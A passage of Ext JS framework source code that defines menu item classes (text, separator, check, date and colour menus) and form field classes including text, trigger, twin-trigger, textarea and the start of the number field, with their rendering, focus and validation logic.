if (!this.disabled && this.fireEvent("click", this, a) !== false && (this.parentMenu && this.parentMenu.fireEvent("itemclick", this, a) !== false)) {
this.handleClick(a)
} else {
a.stopEvent()
}
}, activate:function () {
if (this.disabled) {
return false
}
var a = this.container;
a.addClass(this.activeClass);
this.region = a.getRegion().adjust(2, 2, -2, -2);
this.fireEvent("activate", this);
return true
}, deactivate:function () {
this.container.removeClass(this.activeClass);
this.fireEvent("deactivate", this)
}, shouldDeactivate:function (a) {
return !this.region || !this.region.contains(a.getPoint())
}, handleClick:function (b) {
var a = this.parentMenu;
if (this.hideOnClick) {
if (a.floating) {
this.clickHideDelayTimer = a.hide.defer(this.clickHideDelay, a, [true])
} else {
a.deactivateActive()
}
}
}, beforeDestroy:function () {
clearTimeout(this.clickHideDelayTimer);
Ext.menu.BaseItem.superclass.beforeDestroy.call(this)
}, expandMenu:Ext.emptyFn, hideMenu:Ext.emptyFn});
Ext.reg("menubaseitem", Ext.menu.BaseItem);
Ext.menu.TextItem = Ext.extend(Ext.menu.BaseItem, {hideOnClick:false, itemCls:"x-menu-text", constructor:function (a) {
if (typeof a == "string") {
a = {text:a}
}
Ext.menu.TextItem.superclass.constructor.call(this, a)
}, onRender:function () {
var a = document.createElement("span");
a.className = this.itemCls;
a.innerHTML = this.text;
this.el = a;
Ext.menu.TextItem.superclass.onRender.apply(this, arguments)
}});
Ext.reg("menutextitem", Ext.menu.TextItem);
Ext.menu.Separator = Ext.extend(Ext.menu.BaseItem, {itemCls:"x-menu-sep", hideOnClick:false, activeClass:"", onRender:function (a) {
var b = document.createElement("span");
b.className = this.itemCls;
b.innerHTML = " ";
this.el = b;
a.addClass("x-menu-sep-li");
Ext.menu.Separator.superclass.onRender.apply(this, arguments)
}});
Ext.reg("menuseparator", Ext.menu.Separator);
Ext.menu.Item = Ext.extend(Ext.menu.BaseItem, {itemCls:"x-menu-item", canActivate:true, showDelay:200, altText:"", hideDelay:200, ctype:"Ext.menu.Item", initComponent:function () {
Ext.menu.Item.superclass.initComponent.call(this);
if (this.menu) {
if (Ext.isArray(this.menu)) {
this.menu = {items:this.menu}
}
if (Ext.isObject(this.menu)) {
this.menu.ownerCt = this
}
this.menu = Ext.menu.MenuMgr.get(this.menu);
this.menu.ownerCt = undefined
}
}, onRender:function (d, b) {
if (!this.itemTpl) {
this.itemTpl = Ext.menu.Item.prototype.itemTpl = new Ext.XTemplate('<a id="{id}" class="{cls}" hidefocus="true" unselectable="on" href="{href}"', '<tpl if="hrefTarget">', ' target="{hrefTarget}"', "</tpl>", ">", '<img alt="{altText}" src="{icon}" class="x-menu-item-icon {iconCls}"/>', '<span class="x-menu-item-text">{text}</span>', "</a>")
}
var c = this.getTemplateArgs();
this.el = b ? this.itemTpl.insertBefore(b, c, true) : this.itemTpl.append(d, c, true);
this.iconEl = this.el.child("img.x-menu-item-icon");
this.textEl = this.el.child(".x-menu-item-text");
if (!this.href) {
this.mon(this.el, "click", Ext.emptyFn, null, {preventDefault:true})
}
Ext.menu.Item.superclass.onRender.call(this, d, b)
}, getTemplateArgs:function () {
return{id:this.id, cls:this.itemCls + (this.menu ? " x-menu-item-arrow" : "") + (this.cls ? " " + this.cls : ""), href:this.href || "#", hrefTarget:this.hrefTarget, icon:this.icon || Ext.BLANK_IMAGE_URL, iconCls:this.iconCls || "", text:this.itemText || this.text || " ", altText:this.altText || ""}
}, setText:function (a) {
this.text = a || " ";
if (this.rendered) {
this.textEl.update(this.text);
this.parentMenu.layout.doAutoSize()
}
}, setIconClass:function (a) {
var b = this.iconCls;
this.iconCls = a;
if (this.rendered) {
this.iconEl.replaceClass(b, this.iconCls)
}
}, beforeDestroy:function () {
clearTimeout(this.showTimer);
clearTimeout(this.hideTimer);
if (this.menu) {
delete this.menu.ownerCt;
this.menu.destroy()
}
Ext.menu.Item.superclass.beforeDestroy.call(this)
}, handleClick:function (a) {
if (!this.href) {
a.stopEvent()
}
Ext.menu.Item.superclass.handleClick.apply(this, arguments)
}, activate:function (a) {
if (Ext.menu.Item.superclass.activate.apply(this, arguments)) {
this.focus();
if (a) {
this.expandMenu()
}
}
return true
}, shouldDeactivate:function (a) {
if (Ext.menu.Item.superclass.shouldDeactivate.call(this, a)) {
if (this.menu && this.menu.isVisible()) {
return !this.menu.getEl().getRegion().contains(a.getPoint())
}
return true
}
return false
}, deactivate:function () {
Ext.menu.Item.superclass.deactivate.apply(this, arguments);
this.hideMenu()
}, expandMenu:function (a) {
if (!this.disabled && this.menu) {
clearTimeout(this.hideTimer);
delete this.hideTimer;
if (!this.menu.isVisible() && !this.showTimer) {
this.showTimer = this.deferExpand.defer(this.showDelay, this, [a])
} else {
if (this.menu.isVisible() && a) {
this.menu.tryActivate(0, 1)
}
}
}
}, deferExpand:function (a) {
delete this.showTimer;
this.menu.show(this.container, this.parentMenu.subMenuAlign || "tl-tr?", this.parentMenu);
if (a) {
this.menu.tryActivate(0, 1)
}
}, hideMenu:function () {
clearTimeout(this.showTimer);
delete this.showTimer;
if (!this.hideTimer && this.menu && this.menu.isVisible()) {
this.hideTimer = this.deferHide.defer(this.hideDelay, this)
}
}, deferHide:function () {
delete this.hideTimer;
if (this.menu.over) {
this.parentMenu.setActiveItem(this, false)
} else {
this.menu.hide()
}
}});
Ext.reg("menuitem", Ext.menu.Item);
Ext.menu.CheckItem = Ext.extend(Ext.menu.Item, {itemCls:"x-menu-item x-menu-check-item", groupClass:"x-menu-group-item", checked:false, ctype:"Ext.menu.CheckItem", initComponent:function () {
Ext.menu.CheckItem.superclass.initComponent.call(this);
this.addEvents("beforecheckchange", "checkchange");
if (this.checkHandler) {
this.on("checkchange", this.checkHandler, this.scope)
}
Ext.menu.MenuMgr.registerCheckable(this)
}, onRender:function (a) {
Ext.menu.CheckItem.superclass.onRender.apply(this, arguments);
if (this.group) {
this.el.addClass(this.groupClass)
}
if (this.checked) {
this.checked = false;
this.setChecked(true, true)
}
}, destroy:function () {
Ext.menu.MenuMgr.unregisterCheckable(this);
Ext.menu.CheckItem.superclass.destroy.apply(this, arguments)
}, setChecked:function (b, a) {
var c = a === true;
if (this.checked != b && (c || this.fireEvent("beforecheckchange", this, b) !== false)) {
Ext.menu.MenuMgr.onCheckChange(this, b);
if (this.container) {
this.container[b ? "addClass" : "removeClass"]("x-menu-item-checked")
}
this.checked = b;
if (!c) {
this.fireEvent("checkchange", this, b)
}
}
}, handleClick:function (a) {
if (!this.disabled && !(this.checked && this.group)) {
this.setChecked(!this.checked)
}
Ext.menu.CheckItem.superclass.handleClick.apply(this, arguments)
}});
Ext.reg("menucheckitem", Ext.menu.CheckItem);
Ext.menu.DateMenu = Ext.extend(Ext.menu.Menu, {enableScrolling:false, hideOnClick:true, pickerId:null, cls:"x-date-menu", initComponent:function () {
this.on("beforeshow", this.onBeforeShow, this);
if (this.strict = (Ext.isIE7 && Ext.isStrict)) {
this.on("show", this.onShow, this, {single:true, delay:20})
}
Ext.apply(this, {plain:true, showSeparator:false, items:this.picker = new Ext.DatePicker(Ext.applyIf({internalRender:this.strict || !Ext.isIE, ctCls:"x-menu-date-item", id:this.pickerId}, this.initialConfig))});
this.picker.purgeListeners();
Ext.menu.DateMenu.superclass.initComponent.call(this);
this.relayEvents(this.picker, ["select"]);
this.on("show", this.picker.focus, this.picker);
this.on("select", this.menuHide, this);
if (this.handler) {
this.on("select", this.handler, this.scope || this)
}
}, menuHide:function () {
if (this.hideOnClick) {
this.hide(true)
}
}, onBeforeShow:function () {
if (this.picker) {
this.picker.hideMonthPicker(true)
}
}, onShow:function () {
var a = this.picker.getEl();
a.setWidth(a.getWidth())
}});
Ext.reg("datemenu", Ext.menu.DateMenu);
Ext.menu.ColorMenu = Ext.extend(Ext.menu.Menu, {enableScrolling:false, hideOnClick:true, cls:"x-color-menu", paletteId:null, initComponent:function () {
Ext.apply(this, {plain:true, showSeparator:false, items:this.palette = new Ext.ColorPalette(Ext.applyIf({id:this.paletteId}, this.initialConfig))});
this.palette.purgeListeners();
Ext.menu.ColorMenu.superclass.initComponent.call(this);
this.relayEvents(this.palette, ["select"]);
this.on("select", this.menuHide, this);
if (this.handler) {
this.on("select", this.handler, this.scope || this)
}
}, menuHide:function () {
if (this.hideOnClick) {
this.hide(true)
}
}});
Ext.reg("colormenu", Ext.menu.ColorMenu);
Ext.form.Field = Ext.extend(Ext.BoxComponent, {invalidClass:"x-form-invalid", invalidText:"The value in this field is invalid", focusClass:"x-form-focus", validationEvent:"keyup", validateOnBlur:true, validationDelay:250, defaultAutoCreate:{tag:"input", type:"text", size:"20", autocomplete:"off"}, fieldClass:"x-form-field", msgTarget:"qtip", msgFx:"normal", readOnly:false, disabled:false, submitValue:true, isFormField:true, msgDisplay:"", hasFocus:false, initComponent:function () {
Ext.form.Field.superclass.initComponent.call(this);
this.addEvents("focus", "blur", "specialkey", "change", "invalid", "valid")
}, getName:function () {
return this.rendered && this.el.dom.name ? this.el.dom.name : this.name || this.id || ""
}, onRender:function (c, a) {
if (!this.el) {
var b = this.getAutoCreate();
if (!b.name) {
b.name = this.name || this.id
}
if (this.inputType) {
b.type = this.inputType
}
this.autoEl = b
}
Ext.form.Field.superclass.onRender.call(this, c, a);
if (this.submitValue === false) {
this.el.dom.removeAttribute("name")
}
var d = this.el.dom.type;
if (d) {
if (d == "password") {
d = "text"
}
this.el.addClass("x-form-" + d)
}
if (this.readOnly) {
this.setReadOnly(true)
}
if (this.tabIndex !== undefined) {
this.el.dom.setAttribute("tabIndex", this.tabIndex)
}
this.el.addClass([this.fieldClass, this.cls])
}, getItemCt:function () {
return this.itemCt
}, initValue:function () {
if (this.value !== undefined) {
this.setValue(this.value)
} else {
if (!Ext.isEmpty(this.el.dom.value) && this.el.dom.value != this.emptyText) {
this.setValue(this.el.dom.value)
}
}
this.originalValue = this.getValue()
}, isDirty:function () {
if (this.disabled || !this.rendered) {
return false
}
return String(this.getValue()) !== String(this.originalValue)
}, setReadOnly:function (a) {
if (this.rendered) {
this.el.dom.readOnly = a
}
this.readOnly = a
}, afterRender:function () {
Ext.form.Field.superclass.afterRender.call(this);
this.initEvents();
this.initValue()
}, fireKey:function (a) {
if (a.isSpecialKey()) {
this.fireEvent("specialkey", this, a)
}
}, reset:function () {
this.setValue(this.originalValue);
this.clearInvalid()
}, initEvents:function () {
this.mon(this.el, Ext.EventManager.getKeyEvent(), this.fireKey, this);
this.mon(this.el, "focus", this.onFocus, this);
this.mon(this.el, "blur", this.onBlur, this, this.inEditor ? {buffer:10} : null)
}, preFocus:Ext.emptyFn, onFocus:function () {
this.preFocus();
if (this.focusClass) {
this.el.addClass(this.focusClass)
}
if (!this.hasFocus) {
this.hasFocus = true;
this.startValue = this.getValue();
this.fireEvent("focus", this)
}
}, beforeBlur:Ext.emptyFn, onBlur:function () {
this.beforeBlur();
if (this.focusClass) {
this.el.removeClass(this.focusClass)
}
this.hasFocus = false;
if (this.validationEvent !== false && (this.validateOnBlur || this.validationEvent == "blur")) {
this.validate()
}
var a = this.getValue();
if (String(a) !== String(this.startValue)) {
this.fireEvent("change", this, a, this.startValue)
}
this.fireEvent("blur", this);
this.postBlur()
}, postBlur:Ext.emptyFn, isValid:function (a) {
if (this.disabled) {
return true
}
var c = this.preventMark;
this.preventMark = a === true;
var b = this.validateValue(this.processValue(this.getRawValue()), a);
this.preventMark = c;
return b
}, validate:function () {
if (this.disabled || this.validateValue(this.processValue(this.getRawValue()))) {
this.clearInvalid();
return true
}
return false
}, processValue:function (a) {
return a
}, validateValue:function (b) {
var a = this.getErrors(b)[0];
if (a == undefined) {
return true
} else {
this.markInvalid(a);
return false
}
}, getErrors:function () {
return[]
}, getActiveError:function () {
return this.activeError || ""
}, markInvalid:function (c) {
if (this.rendered && !this.preventMark) {
c = c || this.invalidText;
var a = this.getMessageHandler();
if (a) {
a.mark(this, c)
} else {
if (this.msgTarget) {
this.el.addClass(this.invalidClass);
var b = Ext.getDom(this.msgTarget);
if (b) {
b.innerHTML = c;
b.style.display = this.msgDisplay
}
}
}
}
this.setActiveError(c)
}, clearInvalid:function () {
if (this.rendered && !this.preventMark) {
this.el.removeClass(this.invalidClass);
var a = this.getMessageHandler();
if (a) {
a.clear(this)
} else {
if (this.msgTarget) {
this.el.removeClass(this.invalidClass);
var b = Ext.getDom(this.msgTarget);
if (b) {
b.innerHTML = "";
b.style.display = "none"
}
}
}
}
this.unsetActiveError()
}, setActiveError:function (b, a) {
this.activeError = b;
if (a !== true) {
this.fireEvent("invalid", this, b)
}
}, unsetActiveError:function (a) {
delete this.activeError;
if (a !== true) {
this.fireEvent("valid", this)
}
}, getMessageHandler:function () {
return Ext.form.MessageTargets[this.msgTarget]
}, getErrorCt:function () {
return this.el.findParent(".x-form-element", 5, true) || this.el.findParent(".x-form-field-wrap", 5, true)
}, alignErrorEl:function () {
this.errorEl.setWidth(this.getErrorCt().getWidth(true) - 20)
}, alignErrorIcon:function () {
this.errorIcon.alignTo(this.el, "tl-tr", [2, 0])
}, getRawValue:function () {
var a = this.rendered ? this.el.getValue() : Ext.value(this.value, "");
if (a === this.emptyText) {
a = ""
}
return a
}, getValue:function () {
if (!this.rendered) {
return this.value
}
var a = this.el.getValue();
if (a === this.emptyText || a === undefined) {
a = ""
}
return a
}, setRawValue:function (a) {
return this.rendered ? (this.el.dom.value = (Ext.isEmpty(a) ? "" : a)) : ""
}, setValue:function (a) {
this.value = a;
if (this.rendered) {
this.el.dom.value = (Ext.isEmpty(a) ? "" : a);
this.validate()
}
return this
}, append:function (a) {
this.setValue([this.getValue(), a].join(""))
}});
Ext.form.MessageTargets = {qtip:{mark:function (a, b) {
a.el.addClass(a.invalidClass);
a.el.dom.qtip = b;
a.el.dom.qclass = "x-form-invalid-tip";
if (Ext.QuickTips) {
Ext.QuickTips.enable()
}
}, clear:function (a) {
a.el.removeClass(a.invalidClass);
a.el.dom.qtip = ""
}}, title:{mark:function (a, b) {
a.el.addClass(a.invalidClass);
a.el.dom.title = b
}, clear:function (a) {
a.el.dom.title = ""
}}, under:{mark:function (b, c) {
b.el.addClass(b.invalidClass);
if (!b.errorEl) {
var a = b.getErrorCt();
if (!a) {
b.el.dom.title = c;
return
}
b.errorEl = a.createChild({cls:"x-form-invalid-msg"});
b.on("resize", b.alignErrorEl, b);
b.on("destroy", function () {
Ext.destroy(this.errorEl)
}, b)
}
b.alignErrorEl();
b.errorEl.update(c);
Ext.form.Field.msgFx[b.msgFx].show(b.errorEl, b)
}, clear:function (a) {
a.el.removeClass(a.invalidClass);
if (a.errorEl) {
Ext.form.Field.msgFx[a.msgFx].hide(a.errorEl, a)
} else {
a.el.dom.title = ""
}
}}, side:{mark:function (b, c) {
b.el.addClass(b.invalidClass);
if (!b.errorIcon) {
var a = b.getErrorCt();
if (!a) {
b.el.dom.title = c;
return
}
b.errorIcon = a.createChild({cls:"x-form-invalid-icon"});
if (b.ownerCt) {
b.ownerCt.on("afterlayout", b.alignErrorIcon, b);
b.ownerCt.on("expand", b.alignErrorIcon, b)
}
b.on("resize", b.alignErrorIcon, b);
b.on("destroy", function () {
Ext.destroy(this.errorIcon)
}, b)
}
b.alignErrorIcon();
b.errorIcon.dom.qtip = c;
b.errorIcon.dom.qclass = "x-form-invalid-tip";
b.errorIcon.show()
}, clear:function (a) {
a.el.removeClass(a.invalidClass);
if (a.errorIcon) {
a.errorIcon.dom.qtip = "";
a.errorIcon.hide()
} else {
a.el.dom.title = ""
}
}}};
Ext.form.Field.msgFx = {normal:{show:function (a, b) {
a.setDisplayed("block")
}, hide:function (a, b) {
a.setDisplayed(false).update("")
}}, slide:{show:function (a, b) {
a.slideIn("t", {stopFx:true})
}, hide:function (a, b) {
a.slideOut("t", {stopFx:true, useDisplay:true})
}}, slideRight:{show:function (a, b) {
a.fixDisplay();
a.alignTo(b.el, "tl-tr");
a.slideIn("l", {stopFx:true})
}, hide:function (a, b) {
a.slideOut("l", {stopFx:true, useDisplay:true})
}}};
Ext.reg("field", Ext.form.Field);
Ext.form.TextField = Ext.extend(Ext.form.Field, {grow:false, growMin:30, growMax:800, vtype:null, maskRe:null, disableKeyFilter:false, allowBlank:true, minLength:0, maxLength:Number.MAX_VALUE, minLengthText:"The minimum length for this field is {0}", maxLengthText:"The maximum length for this field is {0}", selectOnFocus:false, blankText:"This field is required", validator:null, regex:null, regexText:"", emptyText:null, emptyClass:"x-form-empty-field", initComponent:function () {
Ext.form.TextField.superclass.initComponent.call(this);
this.addEvents("autosize", "keydown", "keyup", "keypress")
}, initEvents:function () {
Ext.form.TextField.superclass.initEvents.call(this);
if (this.validationEvent == "keyup") {
this.validationTask = new Ext.util.DelayedTask(this.validate, this);
this.mon(this.el, "keyup", this.filterValidation, this)
} else {
if (this.validationEvent !== false && this.validationEvent != "blur") {
this.mon(this.el, this.validationEvent, this.validate, this, {buffer:this.validationDelay})
}
}
if (this.selectOnFocus || this.emptyText) {
this.mon(this.el, "mousedown", this.onMouseDown, this);
if (this.emptyText) {
this.applyEmptyText()
}
}
if (this.maskRe || (this.vtype && this.disableKeyFilter !== true && (this.maskRe = Ext.form.VTypes[this.vtype + "Mask"]))) {
this.mon(this.el, "keypress", this.filterKeys, this)
}
if (this.grow) {
this.mon(this.el, "keyup", this.onKeyUpBuffered, this, {buffer:50});
this.mon(this.el, "click", this.autoSize, this)
}
if (this.enableKeyEvents) {
this.mon(this.el, {scope:this, keyup:this.onKeyUp, keydown:this.onKeyDown, keypress:this.onKeyPress})
}
}, onMouseDown:function (a) {
if (!this.hasFocus) {
this.mon(this.el, "mouseup", Ext.emptyFn, this, {single:true, preventDefault:true})
}
}, processValue:function (a) {
if (this.stripCharsRe) {
var b = a.replace(this.stripCharsRe, "");
if (b !== a) {
this.setRawValue(b);
return b
}
}
return a
}, filterValidation:function (a) {
if (!a.isNavKeyPress()) {
this.validationTask.delay(this.validationDelay)
}
}, onDisable:function () {
Ext.form.TextField.superclass.onDisable.call(this);
if (Ext.isIE) {
this.el.dom.unselectable = "on"
}
}, onEnable:function () {
Ext.form.TextField.superclass.onEnable.call(this);
if (Ext.isIE) {
this.el.dom.unselectable = ""
}
}, onKeyUpBuffered:function (a) {
if (this.doAutoSize(a)) {
this.autoSize()
}
}, doAutoSize:function (a) {
return !a.isNavKeyPress()
}, onKeyUp:function (a) {
this.fireEvent("keyup", this, a)
}, onKeyDown:function (a) {
this.fireEvent("keydown", this, a)
}, onKeyPress:function (a) {
this.fireEvent("keypress", this, a)
}, reset:function () {
Ext.form.TextField.superclass.reset.call(this);
this.applyEmptyText()
}, applyEmptyText:function () {
if (this.rendered && this.emptyText && this.getRawValue().length < 1 && !this.hasFocus) {
this.setRawValue(this.emptyText);
this.el.addClass(this.emptyClass)
}
}, preFocus:function () {
var a = this.el, b;
if (this.emptyText) {
if (a.dom.value == this.emptyText) {
this.setRawValue("");
b = true
}
a.removeClass(this.emptyClass)
}
if (this.selectOnFocus || b) {
a.dom.select()
}
}, postBlur:function () {
this.applyEmptyText()
}, filterKeys:function (b) {
if (b.ctrlKey) {
return
}
var a = b.getKey();
if (Ext.isGecko && (b.isNavKeyPress() || a == b.BACKSPACE || (a == b.DELETE && b.button == -1))) {
return
}
var c = String.fromCharCode(b.getCharCode());
if (!Ext.isGecko && b.isSpecialKey() && !c) {
return
}
if (!this.maskRe.test(c)) {
b.stopEvent()
}
}, setValue:function (a) {
if (this.emptyText && this.el && !Ext.isEmpty(a)) {
this.el.removeClass(this.emptyClass)
}
Ext.form.TextField.superclass.setValue.apply(this, arguments);
this.applyEmptyText();
this.autoSize();
return this
}, getErrors:function (a) {
var d = Ext.form.TextField.superclass.getErrors.apply(this, arguments);
a = Ext.isDefined(a) ? a : this.processValue(this.getRawValue());
if (Ext.isFunction(this.validator)) {
var c = this.validator(a);
if (c !== true) {
d.push(c)
}
}
if (a.length < 1 || a === this.emptyText) {
if (this.allowBlank) {
return d
} else {
d.push(this.blankText)
}
}
if (!this.allowBlank && (a.length < 1 || a === this.emptyText)) {
d.push(this.blankText)
}
if (a.length < this.minLength) {
d.push(String.format(this.minLengthText, this.minLength))
}
if (a.length > this.maxLength) {
d.push(String.format(this.maxLengthText, this.maxLength))
}
if (this.vtype) {
var b = Ext.form.VTypes;
if (!b[this.vtype](a, this)) {
d.push(this.vtypeText || b[this.vtype + "Text"])
}
}
if (this.regex && !this.regex.test(a)) {
d.push(this.regexText)
}
return d
}, selectText:function (h, a) {
var c = this.getRawValue();
var e = false;
if (c.length > 0) {
h = h === undefined ? 0 : h;
a = a === undefined ? c.length : a;
var g = this.el.dom;
if (g.setSelectionRange) {
g.setSelectionRange(h, a)
} else {
if (g.createTextRange) {
var b = g.createTextRange();
b.moveStart("character", h);
b.moveEnd("character", a - c.length);
b.select()
}
}
e = Ext.isGecko || Ext.isOpera
} else {
e = true
}
if (e) {
this.focus()
}
}, autoSize:function () {
if (!this.grow || !this.rendered) {
return
}
if (!this.metrics) {
this.metrics = Ext.util.TextMetrics.createInstance(this.el)
}
var c = this.el;
var b = c.dom.value;
var e = document.createElement("div");
e.appendChild(document.createTextNode(b));
b = e.innerHTML;
Ext.removeNode(e);
e = null;
b += " ";
var a = Math.min(this.growMax, Math.max(this.metrics.getWidth(b) + 10, this.growMin));
this.el.setWidth(a);
this.fireEvent("autosize", this, a)
}, onDestroy:function () {
if (this.validationTask) {
this.validationTask.cancel();
this.validationTask = null
}
Ext.form.TextField.superclass.onDestroy.call(this)
}});
Ext.reg("textfield", Ext.form.TextField);
Ext.form.TriggerField = Ext.extend(Ext.form.TextField, {defaultAutoCreate:{tag:"input", type:"text", size:"16", autocomplete:"off"}, hideTrigger:false, editable:true, readOnly:false, wrapFocusClass:"x-trigger-wrap-focus", autoSize:Ext.emptyFn, monitorTab:true, deferHeight:true, mimicing:false, actionMode:"wrap", defaultTriggerWidth:17, onResize:function (a, c) {
Ext.form.TriggerField.superclass.onResize.call(this, a, c);
var b = this.getTriggerWidth();
if (Ext.isNumber(a)) {
this.el.setWidth(a - b)
}
this.wrap.setWidth(this.el.getWidth() + b)
}, getTriggerWidth:function () {
var a = this.trigger.getWidth();
if (!this.hideTrigger && !this.readOnly && a === 0) {
a = this.defaultTriggerWidth
}
return a
}, alignErrorIcon:function () {
if (this.wrap) {
this.errorIcon.alignTo(this.wrap, "tl-tr", [2, 0])
}
}, onRender:function (b, a) {
this.doc = Ext.isIE ? Ext.getBody() : Ext.getDoc();
Ext.form.TriggerField.superclass.onRender.call(this, b, a);
this.wrap = this.el.wrap({cls:"x-form-field-wrap x-form-field-trigger-wrap"});
this.trigger = this.wrap.createChild(this.triggerConfig || {tag:"img", src:Ext.BLANK_IMAGE_URL, alt:"", cls:"x-form-trigger " + this.triggerClass});
this.initTrigger();
if (!this.width) {
this.wrap.setWidth(this.el.getWidth() + this.trigger.getWidth())
}
this.resizeEl = this.positionEl = this.wrap
}, getWidth:function () {
return(this.el.getWidth() + this.trigger.getWidth())
}, updateEditState:function () {
if (this.rendered) {
if (this.readOnly) {
this.el.dom.readOnly = true;
this.el.addClass("x-trigger-noedit");
this.mun(this.el, "click", this.onTriggerClick, this);
this.trigger.setDisplayed(false)
} else {
if (!this.editable) {
this.el.dom.readOnly = true;
this.el.addClass("x-trigger-noedit");
this.mon(this.el, "click", this.onTriggerClick, this)
} else {
this.el.dom.readOnly = false;
this.el.removeClass("x-trigger-noedit");
this.mun(this.el, "click", this.onTriggerClick, this)
}
this.trigger.setDisplayed(!this.hideTrigger)
}
this.onResize(this.width || this.wrap.getWidth())
}
}, setHideTrigger:function (a) {
if (a != this.hideTrigger) {
this.hideTrigger = a;
this.updateEditState()
}
}, setEditable:function (a) {
if (a != this.editable) {
this.editable = a;
this.updateEditState()
}
}, setReadOnly:function (a) {
if (a != this.readOnly) {
this.readOnly = a;
this.updateEditState()
}
}, afterRender:function () {
Ext.form.TriggerField.superclass.afterRender.call(this);
this.updateEditState()
}, initTrigger:function () {
this.mon(this.trigger, "click", this.onTriggerClick, this, {preventDefault:true});
this.trigger.addClassOnOver("x-form-trigger-over");
this.trigger.addClassOnClick("x-form-trigger-click")
}, onDestroy:function () {
Ext.destroy(this.trigger, this.wrap);
if (this.mimicing) {
this.doc.un("mousedown", this.mimicBlur, this)
}
delete this.doc;
Ext.form.TriggerField.superclass.onDestroy.call(this)
}, onFocus:function () {
Ext.form.TriggerField.superclass.onFocus.call(this);
if (!this.mimicing) {
this.wrap.addClass(this.wrapFocusClass);
this.mimicing = true;
this.doc.on("mousedown", this.mimicBlur, this, {delay:10});
if (this.monitorTab) {
this.on("specialkey", this.checkTab, this)
}
}
}, checkTab:function (a, b) {
if (b.getKey() == b.TAB) {
this.triggerBlur()
}
}, onBlur:Ext.emptyFn, mimicBlur:function (a) {
if (!this.isDestroyed && !this.wrap.contains(a.target) && this.validateBlur(a)) {
this.triggerBlur()
}
}, triggerBlur:function () {
this.mimicing = false;
this.doc.un("mousedown", this.mimicBlur, this);
if (this.monitorTab && this.el) {
this.un("specialkey", this.checkTab, this)
}
Ext.form.TriggerField.superclass.onBlur.call(this);
if (this.wrap) {
this.wrap.removeClass(this.wrapFocusClass)
}
}, beforeBlur:Ext.emptyFn, validateBlur:function (a) {
return true
}, onTriggerClick:Ext.emptyFn});
Ext.form.TwinTriggerField = Ext.extend(Ext.form.TriggerField, {initComponent:function () {
Ext.form.TwinTriggerField.superclass.initComponent.call(this);
this.triggerConfig = {tag:"span", cls:"x-form-twin-triggers", cn:[
{tag:"img", src:Ext.BLANK_IMAGE_URL, alt:"", cls:"x-form-trigger " + this.trigger1Class},
{tag:"img", src:Ext.BLANK_IMAGE_URL, alt:"", cls:"x-form-trigger " + this.trigger2Class}
]}
}, getTrigger:function (a) {
return this.triggers[a]
}, afterRender:function () {
Ext.form.TwinTriggerField.superclass.afterRender.call(this);
var c = this.triggers, b = 0, a = c.length;
for (; b < a; ++b) {
if (this["hideTrigger" + (b + 1)]) {
c[b].hide()
}
}
}, initTrigger:function () {
var a = this.trigger.select(".x-form-trigger", true), b = this;
a.each(function (d, g, c) {
var e = "Trigger" + (c + 1);
d.hide = function () {
var h = b.wrap.getWidth();
this.dom.style.display = "none";
b.el.setWidth(h - b.trigger.getWidth());
b["hidden" + e] = true
};
d.show = function () {
var h = b.wrap.getWidth();
this.dom.style.display = "";
b.el.setWidth(h - b.trigger.getWidth());
b["hidden" + e] = false
};
this.mon(d, "click", this["on" + e + "Click"], this, {preventDefault:true});
d.addClassOnOver("x-form-trigger-over");
d.addClassOnClick("x-form-trigger-click")
}, this);
this.triggers = a.elements
}, getTriggerWidth:function () {
var a = 0;
Ext.each(this.triggers, function (d, c) {
var e = "Trigger" + (c + 1), b = d.getWidth();
if (b === 0 && !this["hidden" + e]) {
a += this.defaultTriggerWidth
} else {
a += b
}
}, this);
return a
}, onDestroy:function () {
Ext.destroy(this.triggers);
Ext.form.TwinTriggerField.superclass.onDestroy.call(this)
}, onTrigger1Click:Ext.emptyFn, onTrigger2Click:Ext.emptyFn});
Ext.reg("trigger", Ext.form.TriggerField);
Ext.form.TextArea = Ext.extend(Ext.form.TextField, {growMin:60, growMax:1000, growAppend:" \n ", enterIsSpecial:false, preventScrollbars:false, onRender:function (b, a) {
if (!this.el) {
this.defaultAutoCreate = {tag:"textarea", style:"width:100px;height:60px;", autocomplete:"off"}
}
Ext.form.TextArea.superclass.onRender.call(this, b, a);
if (this.grow) {
this.textSizeEl = Ext.DomHelper.append(document.body, {tag:"pre", cls:"x-form-grow-sizer"});
if (this.preventScrollbars) {
this.el.setStyle("overflow", "hidden")
}
this.el.setHeight(this.growMin)
}
}, onDestroy:function () {
Ext.removeNode(this.textSizeEl);
Ext.form.TextArea.superclass.onDestroy.call(this)
}, fireKey:function (a) {
if (a.isSpecialKey() && (this.enterIsSpecial || (a.getKey() != a.ENTER || a.hasModifier()))) {
this.fireEvent("specialkey", this, a)
}
}, doAutoSize:function (a) {
return !a.isNavKeyPress() || a.getKey() == a.ENTER
}, filterValidation:function (a) {
if (!a.isNavKeyPress() || (!this.enterIsSpecial && a.keyCode == a.ENTER)) {
this.validationTask.delay(this.validationDelay)
}
}, autoSize:function () {
if (!this.grow || !this.textSizeEl) {
return
}
var c = this.el, a = Ext.util.Format.htmlEncode(c.dom.value), d = this.textSizeEl, b;
Ext.fly(d).setWidth(this.el.getWidth());
if (a.length < 1) {
a = "  "
} else {
a += this.growAppend;
if (Ext.isIE) {
a = a.replace(/\n/g, " <br />")
}
}
d.innerHTML = a;
b = Math.min(this.growMax, Math.max(d.offsetHeight, this.growMin));
if (b != this.lastHeight) {
this.lastHeight = b;
this.el.setHeight(b);
this.fireEvent("autosize", this, b)
}
}});
Ext.reg("textarea", Ext.form.TextArea);
Ext.form.NumberField = Ext.extend(Ext.form.TextField, {fieldClass:"x-form-field x-form-num-field", allowDecimals:true, decimalSeparator:".", decimalPrecision:2, allowNegative:true, minValue:Number.NEGATIVE_INFINITY, maxValue:Number.MAX_VALUE, minText:"The minimum value for this field is {0}", maxText:"The maximum value for this field is {0}", nanText:"{0} is not a valid number", baseChars:"0123456789", autoStripChars:false, initEvents:function () {
var a = this.baseChars + "";
if (this.allowDecimals) {
a += this.decimalSeparator
}
if (this.allowNegative) {
a += "-"
}
a = Ext.escapeRe(a);
this.maskRe = new RegExp("[" + a + "]");
if (this.autoStripChars) {
this.stripCharsRe = new RegExp("[^" + a + "]", "gi")
}
Ext.form.NumberField.superclass.initEvents.call(this)
}, getErrors:function (b) {
var c = Ext.form.NumberField.superclass.getErrors.apply(this, arguments);
b = Ext.isDefined(b) ? b : this.processValue(this.getRawValue());
if (b.length < 1) {
return c
}
b = String(b).replace(this.decimalSeparator, ".");
if (isNaN(b)) {
c.push(String.format(this.nanText, b))
}
var a = this.parseValue(b);
